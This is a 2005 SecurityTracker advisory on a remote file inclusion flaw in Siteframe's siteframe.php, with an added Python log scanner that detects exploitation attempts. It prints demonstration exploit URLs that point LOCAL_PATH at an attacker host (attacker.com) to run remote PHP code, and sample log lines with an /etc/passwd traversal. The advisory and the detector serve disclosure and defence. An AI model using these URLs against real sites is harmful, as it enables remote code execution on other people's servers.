SecurityTracker.com
Category:  Application (Forum/Board/Portal)  >  Siteframe
Vendors:  Broadpool
Siteframe Include File Flaw in 'siteframe.php' Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1014150
SecurityTracker URL:  http://securitytracker.com/id?1014150
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Jun 9 2005
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Description:  PRI[l from MOROCCO reported a vulnerability in Siteframe. A remote user can execute arbitrary commands on the target system.

The 'siteframe.php' script includes files relative to the user-supplied 'LOCAL_PATH' parameter without properly validating the input. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/siteframe/siteframe.php?LOCAL_PATH=http://[attacker]/PRI[ll

Impact:  A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.siteframe.org/
Cause:  Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "the_r00t theroot" <the_r00t3r@hotmail.com>
Message History:   None.
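As an added defender's example (not code from the advisory or from the Siteframe project), the following Python scans Apache combined-format access-log lines for requests to 'siteframe.php' whose 'LOCAL_PATH' value is a remote URL (any stream-wrapper scheme or a protocol-relative '//host' prefix, including double percent-encoded forms) or a directory-traversal sequence. The log lines, IP addresses and hosts are constructed sample data; the script name and parameter name come from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-format access log lines (sample data, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [09/Jun/2005:01:21:19 +0000] "GET /siteframe/siteframe.php?LOCAL_PATH=http://203.0.113.9/PRI%5Bll HTTP/1.1" 200 512
198.51.100.7 - - [09/Jun/2005:01:22:03 +0000] "GET /siteframe/siteframe.php?LOCAL_PATH=%48%54%54%50://203.0.113.9/x HTTP/1.1" 200 512
198.51.100.8 - - [09/Jun/2005:01:23:44 +0000] "GET /siteframe/siteframe.php?LOCAL_PATH=../../../../etc/passwd HTTP/1.1" 200 512
192.0.2.10 - - [09/Jun/2005:01:24:10 +0000] "GET /siteframe/siteframe.php?LOCAL_PATH=/var/www/siteframe/ HTTP/1.1" 200 512
192.0.2.11 - - [09/Jun/2005:01:25:00 +0000] "GET /siteframe/index.php HTTP/1.1" 200 1024
"""

# Fields we need from a combined-format line: client IP, timestamp, request URL.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d+)'
)
# Any URL scheme of two or more characters (http:, https:, ftp:, php:, data:) or a
# protocol-relative "//host" prefix. A single letter plus colon ("c:") is a Windows
# drive letter and is deliberately not matched.
SCHEME_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]+:|//)', re.IGNORECASE)

def classify_include_value(value):
    """Return 'remote', 'traversal' or None for one LOCAL_PATH value."""
    decoded = unquote(unquote(value))  # collapse double percent-encoding
    if SCHEME_RE.match(decoded):
        return "remote"
    if ".." in decoded.replace("\\", "/").split("/"):
        return "traversal"
    return None

def scan_access_log(text, script="siteframe.php", param="LOCAL_PATH"):
    """Return (ip, timestamp, kind, decoded_value) for each request to `script`
    whose `param` carries a remote URL or a directory-traversal sequence."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        if not parts.path.lower().endswith(script):
            continue
        # parse_qs percent-decodes once; classify_include_value handles the rest
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            kind = classify_include_value(value)
            if kind:
                hits.append((m.group("ip"), m.group("ts"), kind, unquote(value)))
    return hits
```

Running scan_access_log(SAMPLE_LOG) flags the first three sample requests and leaves the plain local path and the unrelated index.php request alone; the same check applied server-side before include() is the mitigation the advisory's "input validation error" cause points to.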


 Source Message Contents

Date:  Thu, 09 Jun 2005 01:21:19 +0000
From:  "the_r00t theroot" <the_r00t3r@hotmail.com>
Subject:  siteframe file bug in siteframe.php lets Remote Users Execute Arbitrary Command

 
 
Title : siteframe file bug in siteframe.php lets Remote Users Execute Arbitrary Command
Date : 09/06/2005
Impact: Remote code execution
Risk Level: High
 
http://victim.com/siteframe/siteframe.php?LOCAL_PATH=http://attacker.com/PRI[ll
 
..::Credits for this vulnerability goes to PRI[l from MOROCCO::..
greetz : Arabian FighterZ  - #whackerz - Mianwalian - mani1 - ch33ta - and all friends :D
..::PROUD TO BE Moroccan::..
 
 


Copyright 2005, SecurityGlobal.net LLC